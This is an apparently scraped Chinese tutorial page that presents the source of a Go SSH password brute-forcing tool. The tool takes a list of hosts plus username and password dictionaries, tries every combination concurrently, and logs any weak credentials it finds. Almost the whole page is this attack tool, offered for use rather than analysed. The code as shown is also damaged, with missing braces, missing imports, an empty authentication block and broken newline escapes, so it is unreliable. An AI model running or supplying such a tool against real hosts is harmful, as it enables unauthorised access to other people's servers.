Golang语言版ssh口令破解工具 --必须亲自敲代码,否则看了白看

本文章向大家介绍Golang语言版ssh口令破解工具 --必须亲自敲代码,否则看了白看,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。


<img src="http://www.golangweb.com/forum.php?mod=image&aid=220&size=300x300&key=d3951603dc720a0e&nocache=yes&type=fixnone" border="0" aid="attachimg_220" alt="">

1 iplist的格式为ip:port,如111.111.111.111:22

2 user.txt为用户名字典

3 password.txt为密码字典

4 github:https://github.com/netxfly/crack_ssh/blob/master/scan_ssh.go


package main
import (
type HostInfo struct {
    host    string
    port    string
    user    string
    pass    string
    is_weak bool
// help function
func Usage(cmd string) {
    fmt.Println(strings.Repeat("-", 50))
    fmt.Println("SSH Scanner by hartnett [x@xsec.io]")
    fmt.Printf("%s iplist userdic passdicn", cmd)
    fmt.Println(strings.Repeat("-", 50))
// read lime from file and Scan
func Prepare(iplist, user_dict, pass_dict string) (slice_iplist, slice_user, slice_pass []string) {
    iplistFile, _ := os.Open(iplist)
    defer iplistFile.Close()
    scanner := bufio.NewScanner(iplistFile)
    for scanner.Scan() {
        slice_iplist = append(slice_iplist, scanner.Text())
    user_dictFile, _ := os.Open(user_dict)
    defer user_dictFile.Close()
    scanner_u := bufio.NewScanner(user_dictFile)
    for scanner_u.Scan() {
        slice_user = append(slice_user, scanner_u.Text())
    pass_dictFile, _ := os.Open(pass_dict)
    defer pass_dictFile.Close()
    scanner_p := bufio.NewScanner(pass_dictFile)
    for scanner_p.Scan() {
        slice_pass = append(slice_pass, scanner_p.Text())
    return slice_iplist, slice_user, slice_pass
// Scan function
func Scan(slice_iplist, slice_user, slice_pass []string) {
    for _, host_port := range slice_iplist {
        fmt.Printf("Try to crack %sn", host_port)
        t := strings.Split(host_port, ":")
        host := t[0]
        port := t[1]
        n := len(slice_user) * len(slice_pass)
        chan_scan_result := make(chan HostInfo, n)
        for _, user := range slice_user {
            for _, passwd := range slice_pass {
                host_info := HostInfo{}
                host_info.host = host
                host_info.port = port
                host_info.user = user
                host_info.pass = passwd
                host_info.is_weak = false
                go Crack(host_info, chan_scan_result)
                for runtime.NumGoroutine() > runtime.NumCPU()*300 {
                    time.Sleep(10 * time.Microsecond)
        done := make(chan bool, n)
        go func() {
            for i := 0; i < cap(chan_scan_result); i++ {
                select {
                case r := <-chan_scan_result:
                    // fmt.Printf("Try %s:%s, user: %s, password: %sn", r.host, r.port, r.user, r.pass)
                    if r.is_weak {
                        var buf bytes.Buffer
                        logger := log.New(&buf, "logger: ", log.Ldate)
                        logger.Printf("%s:%s, user: %s, password: %sn", r.host, r.port, r.user, r.pass)
                case <-time.After(1 * time.Second):
                    // fmt.Println("timeout")
                done <- true
        for i := 0; i < cap(done); i++ {
            // fmt.Println(<-done)
// crack passwd
func Crack(host_info HostInfo, chan_scan_result chan HostInfo) {
    host := host_info.host
    port := host_info.port
    user := host_info.user
    passwd := host_info.pass
    is_ok := host_info.is_weak
    config := &ssh.ClientConfig{
        User: user,
        Auth: []ssh.AuthMethod{
    client, err := ssh.Dial("tcp", host+":"+port, config)
    if err != nil {
        is_ok = false
        // panic("Failed to dial: " + err.Error())
    } else {
        session, err := client.NewSession()
        defer session.Close()
        if err != nil {
            is_ok = false
        } else {
            is_ok = true
    host_info.is_weak = is_ok
    chan_scan_result <- host_info
// main function
func main() {
    if len(os.Args) != 4 {
    } else {
        iplist := os.Args[1]
        user_dict := os.Args[2]
        pass_dict := os.Args[3]
        Scan(Prepare(iplist, user_dict, pass_dict))